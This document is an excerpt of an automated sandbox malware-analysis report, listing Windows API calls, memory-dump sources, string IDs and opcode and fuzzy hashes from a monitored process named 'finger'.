                                                                                                                                            • Instruction Fuzzy Hash: 56E0203664030C27EB206568EC45F62374897487E4F0D4550BF5CDB1C1D734F5418950
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,02F520E0,02F683EF,02F65AAF,02F520B0), ref: 02F58573
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            • Opcode ID: 8baa53329ec217cb7499463543f5916ee93653386981487b4d276d87569bd488
                                                                                                                                            • Instruction ID: 08a39a87baca2d210a625d43af68b5f8009e8d14b7eca530c698d17ef6e4cb27
                                                                                                                                            • Opcode Fuzzy Hash: 8baa53329ec217cb7499463543f5916ee93653386981487b4d276d87569bd488
                                                                                                                                            • Instruction Fuzzy Hash: 04E0C2317842053EEB10E6B49C06F6B3A495B507C0F044078BE09E76C2D9A0A1008A90
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,02F520E0,02F683EF,02F65AAF,02F520B0), ref: 02F58573
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            • Opcode ID: ec561b8a8f83b8c0cfb3fd323729bff6cdd967d7f4fe86c04794773a90c7fb8d
                                                                                                                                            • Instruction ID: 91bb52d5ae37a35ba9dd0317c5fe50635aa510a1a8c4a372ce8945d0329cb532
                                                                                                                                            • Opcode Fuzzy Hash: ec561b8a8f83b8c0cfb3fd323729bff6cdd967d7f4fe86c04794773a90c7fb8d
                                                                                                                                            • Instruction Fuzzy Hash: E7D05E717843053BFA10E6A49C06F173A8E9B44BD4F448074BF0CE76C2EDA5F1508AA5
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: d4a24b7d7a7a93ba51d5230566064f6162470bacb3d0707f9dc3712119181a21
                                                                                                                                            • Instruction ID: 90abf9f3538b61e71be130e3d30f3a44aebb570a1e3a213014dd4886dccb93bf
                                                                                                                                            • Opcode Fuzzy Hash: d4a24b7d7a7a93ba51d5230566064f6162470bacb3d0707f9dc3712119181a21
                                                                                                                                            • Instruction Fuzzy Hash: 5FB09B719015C5C5DA11F760560C717790467D1701F1AC477E2030741F477DD5D1E275
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                            • Opcode ID: f2e86c01b28a29d6ed21185f7a77ac08053ace89558e554464ff26b891b9ad91
                                                                                                                                            • Instruction ID: 1bbe3cc0dcec205140d3cb5fd8e8a7cd8c1022beb23b3a8037275e35b7a09377
                                                                                                                                            • Opcode Fuzzy Hash: f2e86c01b28a29d6ed21185f7a77ac08053ace89558e554464ff26b891b9ad91
                                                                                                                                            • Instruction Fuzzy Hash: 7E51F676A00A46AFDB30DF5CC990A7EF7F9EB44200B08886FE496C7641E774DA508760
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                            • Instruction ID: 184921320da508079cff20cc86ca2451b28bbfdab111233d23dba5dfba12c830
                                                                                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                            • Instruction Fuzzy Hash: 83020675518381AFC305CF28C594A6BBBF5EFC8710F088A2EF9959B264DB31E905CB52
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                            • Opcode ID: 66bf1f2416c1cecd58a05862acc9343b6a5ee0a23171aa3cfed803d2c7bc1695
                                                                                                                                            • Instruction ID: 2c648a2d9255b70fe032ac3615ddedfc1ef8815c31d72f074ea7e6870cfeca4f
                                                                                                                                            • Opcode Fuzzy Hash: 66bf1f2416c1cecd58a05862acc9343b6a5ee0a23171aa3cfed803d2c7bc1695
                                                                                                                                            • Instruction Fuzzy Hash: 15216277A00619ABCB20DF7DCD40AEEB7F8EF44640F08052BE915E7200E731D9119BA1
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                            • Opcode ID: 647908b1d44cef710d041cf18948fbb4cd5d9d5d8377ad7cde2cdb81a5d20f8c
                                                                                                                                            • Instruction ID: d81e3394c1d30c766a1e951c7a52de3d76b9319da7b02cc881ae7e2640956011
                                                                                                                                            • Opcode Fuzzy Hash: 647908b1d44cef710d041cf18948fbb4cd5d9d5d8377ad7cde2cdb81a5d20f8c
                                                                                                                                            • Instruction Fuzzy Hash: 00315476A006199FDB20DF2DDD40BEEB7F8EF45610F44455AE849E7240EB309A558BA0